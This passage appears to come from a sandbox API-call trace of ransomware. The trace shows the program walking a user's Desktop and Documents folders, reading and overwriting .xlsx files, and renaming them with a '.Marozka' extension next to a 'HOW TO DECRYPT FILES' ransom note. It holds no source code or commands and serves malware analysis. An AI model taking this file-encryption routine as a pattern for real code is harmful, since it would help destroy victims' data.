lpFindFileData=0x5be89c) returned 1 [0048.372] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.372] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.372] FindNextFileW (in: hFindFile=0xa7d708, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 0 [0048.372] FindClose (in: hFindFile=0xa7d708 | out: hFindFile=0xa7d708) returned 1 [0048.372] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb24) returned 1 [0048.372] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb30) returned 1 [0048.372] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb68) returned 1 [0048.372] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", nBufferLength=0x105, lpBuffer=0x5be61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop", lpFilePart=0x0) returned 0x17 [0048.372] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\*", lpFindFileData=0x5be890 | out: lpFindFileData=0x5be890) returned 0xa7dc08 [0048.373] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.384] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.392] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.392] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.392] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.393] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.393] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.393] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.393] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.396] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.397] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.397] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.397] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.397] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.397] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.398] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.398] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.414] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.415] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.415] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.415] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.415] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.415] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.416] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.416] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.416] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.416] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.416] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.416] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.417] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.417] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.417] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.417] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.417] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.418] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.418] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.418] FindNextFileW (in: hFindFile=0xa7dc08, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 0 [0048.418] FindClose (in: hFindFile=0xa7dc08 | out: hFindFile=0xa7dc08) returned 1 [0048.418] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb24) returned 1 [0048.418] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb30) returned 1 [0048.418] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0048.418] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH", lpFilePart=0x0) returned 0x2c [0048.419] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xa7d988 [0048.419] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0048.419] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0048.419] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0048.419] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0048.419] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0048.419] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0048.419] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0048.420] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0048.420] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0048.420] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0048.420] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0048.420] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0048.420] FindNextFileW (in: hFindFile=0xa7d988, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0048.420] FindClose (in: hFindFile=0xa7d988 | out: hFindFile=0xa7d988) returned 1 [0048.420] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0048.421] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0048.421] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beaf4) returned 1 [0048.421] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH", nBufferLength=0x105, lpBuffer=0x5be5a8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH", lpFilePart=0x0) returned 0x2c [0048.421] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\kbzW7L4eEuZYo_embyQH\\*", lpFindFileData=0x5be81c | out: lpFindFileData=0x5be81c) returned 0xa7dac8 [0048.421] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0048.421] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0048.421] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0048.421] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0048.422] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0048.422] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0048.422] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0048.422] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0048.422] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0048.422] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0048.423] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0048.423] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 1 [0048.423] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be828 | out: lpFindFileData=0x5be828) returned 0 [0048.423] FindClose (in: hFindFile=0xa7dac8 | out: hFindFile=0xa7dac8) returned 1 [0048.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beab0) returned 1 [0048.423] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beabc) returned 1 [0048.423] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb68) returned 1 [0048.423] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x105, lpBuffer=0x5be61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents", lpFilePart=0x0) returned 0x19 [0048.424] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\*", lpFindFileData=0x5be890 | out: lpFindFileData=0x5be890) returned 0xa7dac8 [0048.424] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.424] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.424] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.424] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.424] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.424] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.424] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.424] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.424] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.424] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.425] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.425] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.425] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.425] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.425] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.425] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.425] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.425] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.425] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.425] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.425] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.425] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.425] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.425] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.425] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.426] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.426] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.426] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.426] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.426] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.426] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 0 [0048.426] FindClose (in: hFindFile=0xa7dac8 | out: hFindFile=0xa7dac8) returned 1 [0048.426] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb24) returned 1 [0048.426] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb30) returned 1 [0048.426] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5beb68) returned 1 [0048.426] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents", nBufferLength=0x105, lpBuffer=0x5be61c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents", lpFilePart=0x0) returned 0x19 [0048.426] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\*", lpFindFileData=0x5be890 | out: lpFindFileData=0x5be890) returned 0xa7dac8 [0048.426] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.427] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.427] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.427] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.427] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.427] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.427] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.427] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.427] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.427] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.427] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.427] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.427] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.427] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.427] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.427] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.427] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.427] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.427] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.427] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.427] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.427] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.427] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.427] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.428] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.428] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.428] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.428] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.428] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.428] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 1 [0048.428] FindNextFileW (in: hFindFile=0xa7dac8, lpFindFileData=0x5be89c | out: lpFindFileData=0x5be89c) returned 0 [0048.428] FindClose (in: hFindFile=0xa7dac8 | out: hFindFile=0xa7dac8) returned 1 [0048.428] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb24) returned 1 [0048.428] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5beb30) returned 1 [0048.428] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\6CfTpQZ-IkHmHlJ.xlsx", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\6CfTpQZ-IkHmHlJ.xlsx", lpFilePart=0x0) returned 0x2e [0048.428] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0048.428] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\6CfTpQZ-IkHmHlJ.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\6cftpqz-ikhmhlj.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0048.428] GetFileType (hFile=0x2e0) returned 0x1 [0048.428] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0048.428] GetFileType (hFile=0x2e0) returned 0x1 [0048.428] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x993b [0048.429] ReadFile (in: hFile=0x2e0, lpBuffer=0x27e9468, nNumberOfBytesToRead=0x993b, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x27e9468*, lpNumberOfBytesRead=0x5beabc*=0x993b, lpOverlapped=0x0) returned 1 [0048.430] CloseHandle (hObject=0x2e0) returned 1 [0048.558] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) returned 0x38 [0048.558] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea88) returned 1 [0048.558] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka" (normalized: "c:\\users\\fd1hvy\\desktop\\how to decrypt files.txt.marozka"), fInfoLevelId=0x0, lpFileInformation=0x5beb04 | out: lpFileInformation=0x5beb04*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0048.559] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea84) returned 1 [0048.559] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\6CfTpQZ-IkHmHlJ.xlsx", nBufferLength=0x105, lpBuffer=0x5be4bc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\6CfTpQZ-IkHmHlJ.xlsx", lpFilePart=0x0) returned 0x2e [0048.559] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea00) returned 1 [0048.559] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\6CfTpQZ-IkHmHlJ.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\6cftpqz-ikhmhlj.xlsx"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0048.560] GetFileType (hFile=0x2e0) returned 0x1 [0048.560] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5be9fc) returned 1 [0048.560] GetFileType (hFile=0x2e0) returned 0x1 [0048.560] WriteFile (in: hFile=0x2e0, lpBuffer=0x267e51c*, nNumberOfBytesToWrite=0x9940, lpNumberOfBytesWritten=0x5beab0, lpOverlapped=0x0 | out: lpBuffer=0x267e51c*, lpNumberOfBytesWritten=0x5beab0*=0x9940, lpOverlapped=0x0) returned 1 [0048.564] CloseHandle (hObject=0x2e0) returned 1 [0048.566] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\6CfTpQZ-IkHmHlJ.xlsx", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\6CfTpQZ-IkHmHlJ.xlsx", lpFilePart=0x0) returned 0x2e [0048.566] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\6CfTpQZ-IkHmHlJ.xlsx.Marozka", nBufferLength=0x105, lpBuffer=0x5be5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\6CfTpQZ-IkHmHlJ.xlsx.Marozka", lpFilePart=0x0) returned 0x36 [0048.566] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea94) returned 1 [0048.566] GetFileAttributesExW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\6CfTpQZ-IkHmHlJ.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\6cftpqz-ikhmhlj.xlsx"), fInfoLevelId=0x0, lpFileInformation=0x5beb10 | out: lpFileInformation=0x5beb10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2458ac80, ftCreationTime.dwHighDateTime=0x1d4a125, ftLastAccessTime.dwLowDateTime=0xe255e5b0, ftLastAccessTime.dwHighDateTime=0x1d45d3f, ftLastWriteTime.dwLowDateTime=0xdfadf567, ftLastWriteTime.dwHighDateTime=0x1d4e6cd, nFileSizeHigh=0x0, nFileSizeLow=0x9940)) returned 1 [0048.566] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea90) returned 1 [0048.566] MoveFileW (lpExistingFileName="C:\\Users\\FD1HVy\\Documents\\6CfTpQZ-IkHmHlJ.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\6cftpqz-ikhmhlj.xlsx"), lpNewFileName="C:\\Users\\FD1HVy\\Documents\\6CfTpQZ-IkHmHlJ.xlsx.Marozka" (normalized: "c:\\users\\fd1hvy\\documents\\6cftpqz-ikhmhlj.xlsx.marozka")) returned 1 [0048.567] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Documents\\AUvkV9TfiYVF6wmVFnf_.xlsx", nBufferLength=0x105, lpBuffer=0x5be4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Documents\\AUvkV9TfiYVF6wmVFnf_.xlsx", lpFilePart=0x0) returned 0x33 [0048.567] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x5bea14) returned 1 [0048.567] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\AUvkV9TfiYVF6wmVFnf_.xlsx" (normalized: "c:\\users\\fd1hvy\\documents\\auvkv9tfiyvf6wmvfnf_.xlsx"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x2e0 [0048.567] GetFileType (hFile=0x2e0) returned 0x1 [0048.567] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x5bea10) returned 1 [0048.567] GetFileType (hFile=0x2e0) returned 0x1 [0048.567] GetFileSize (in: hFile=0x2e0, lpFileSizeHigh=0x5beb10 | out: lpFileSizeHigh=0x5beb10*=0x0) returned 0x9a6d [0048.567] ReadFile (in: hFile=0x2e0, lpBuffer=0x268836c, nNumberOfBytesToRead=0x9a6d, lpNumberOfBytesRead=0x5beabc, lpOverlapped=0x0 | out: lpBuffer=0x268836c*, lpNumberOfBytesRead=0x5beabc*=0x9a6d, lpOverlapped=0x0) returned 1 [0048.568] CloseHandle (hObject=0x2e0) returned 1 [0048.589] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", nBufferLength=0x105, lpBuffer=0x5be5d4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\HOW TO DECRYPT FILES.txt.Marozka", lpFilePart=0x0) 